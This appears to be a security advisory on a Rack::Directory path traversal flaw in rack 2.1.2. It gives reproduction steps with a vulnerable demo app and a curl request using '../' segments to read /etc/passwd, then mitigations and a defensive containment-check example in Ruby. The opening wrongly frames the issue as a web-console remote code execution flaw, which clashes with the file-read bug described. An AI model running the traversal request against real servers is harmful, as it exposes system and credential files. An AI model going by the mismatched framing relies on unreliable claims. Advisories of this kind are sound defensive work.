Ruby on Rails (often called Rails) is a web application framework written in Ruby that emphasizes convention over configuration and the principle of "don't repeat yourself" (DRY). It provides developers with a structured and efficient way to build database-backed web applications through pre-built patterns for rapid development.
The web-console gem is designed to provide an interactive Ruby console in the browser during development. However, due to improper access control, certain versions allowed unauthorized remote access through directory traversal, thereby enabling Remote Code Execution (RCE).
Remote code execution flaws fall within the OWASP (Open Web Application Security Project) Top 10. They are among the most damaging classes of vulnerability because injected, remotely executed code:
- can access internal application objects/methods
- can often bypass security controls
- may persist across sessions
- can often pivot to gain OS-level access.
Details
Module Info
- Product: Ruby on Rails Framework
- Affected packages: rack
- GitHub repository: https://github.com/rack/rack
- Published package: The individual rack gem or the entire Rails Framework (which includes rack).
- Package manager: gem
Vulnerability Info
If certain directories exist in a directory that is managed by Rack::Directory, an attacker could, using this vulnerability, read the contents of files on the server that were outside of the root specified in the Rack::Directory initializer.
An attacker could read arbitrary files on the server, potentially accessing sensitive information not intended for public exposure.
Steps To Reproduce
1. Install a version of Rack that contains this vulnerability, such as 2.1.2:
gem install rack -v 2.1.2
2. Create a simple Rack application using Rack::Directory by creating a file named vulnerable_app.rb:
   require 'rack'
   app = Rack::Builder.new do
     # Rack::Directory lists and serves files beneath the given root; in affected
     # versions the root boundary is not enforced, which is the defect reproduced here.
     use Rack::Directory, Dir.pwd # Serves the current directory
     run lambda { |env| [200, { 'Content-Type' => 'text/plain' }, ['Hello from Rack!']] }
   end
   Rack::Handler::WEBrick.run app, Port: 9292
   This app exposes the current directory and its contents over HTTP.
3. Start the vulnerable server:
ruby vulnerable_app.rb
4. Exploit the path traversal vulnerability by attempting to read /etc/passwd:
curl http://localhost:9292/../../../../../../etc/passwd
5. Observe that a file outside the served root is returned.
Addressing the Issue
If you are unable to upgrade immediately, avoid using Rack::Directory. For instance, you can write a custom directory listing controller to obtain a list of files. To replace Rack::Directory's file serving, you can use Rack::Static.
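As an added example, not taken from this advisory or from Rack's own code, the following minimal Rack-compatible file server shows the containment check that affected Rack::Directory versions lack: the request path is percent-decoded, resolved against the root, and refused unless the result is the root itself or a descendant of it. The names contained_path, file_app and demo_statuses, and the temporary root with its public.txt file, are assumptions constructed for the demonstration.

```ruby
require 'tmpdir'

# Percent-decode once, then resolve against root. Return the absolute path only
# if it is root itself or a descendant of root; nil means "refuse to serve".
def contained_path(root, request_path)
  root = File.expand_path(root)
  # Decode on a binary copy so encoded dot segments such as %2e%2e are normalized too.
  decoded = request_path.b.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr(Encoding::BINARY) }
  return nil if decoded.include?("\0") # NUL bytes never belong in a served path
  candidate = File.expand_path(File.join(root, decoded))
  # Compare with a trailing separator so "/srv/www-old" is not accepted for root "/srv/www".
  return nil unless candidate == root || candidate.start_with?(root + File::SEPARATOR)
  candidate
end

# Minimal Rack-compatible app (any callable taking env works; the rack gem is
# not required to run this). Serves regular files under root and nothing else.
def file_app(root)
  lambda do |env|
    path = contained_path(root, env['PATH_INFO'].to_s)
    if path && File.file?(path)
      [200, { 'content-type' => 'application/octet-stream' }, [File.binread(path)]]
    else
      [404, { 'content-type' => 'text/plain' }, ['not found']]
    end
  end
end

# Constructed demo: a throwaway root holding one public file, then the kind of
# requests the reproduction step above sends. Returns request path => status.
def demo_statuses
  Dir.mktmpdir do |root|
    File.write(File.join(root, 'public.txt'), 'hello')
    app = file_app(root)
    ['/public.txt', '/../../../../../../etc/passwd', '/%2e%2e/%2e%2e/etc/passwd'].to_h do |req|
      [req, app.call('PATH_INFO' => req)[0]]
    end
  end
end

puts demo_statuses.inspect if $PROGRAM_NAME == __FILE__
```

File.expand_path does not resolve symlinks, so if the served root may contain symlinks pointing outside it, apply the same comparison to File.realpath of the candidate as well.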
Credits
Mitigation
Users of affected versions of Ruby on Rails should follow one of the following mitigations:
- Upgrade to a corrected version.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.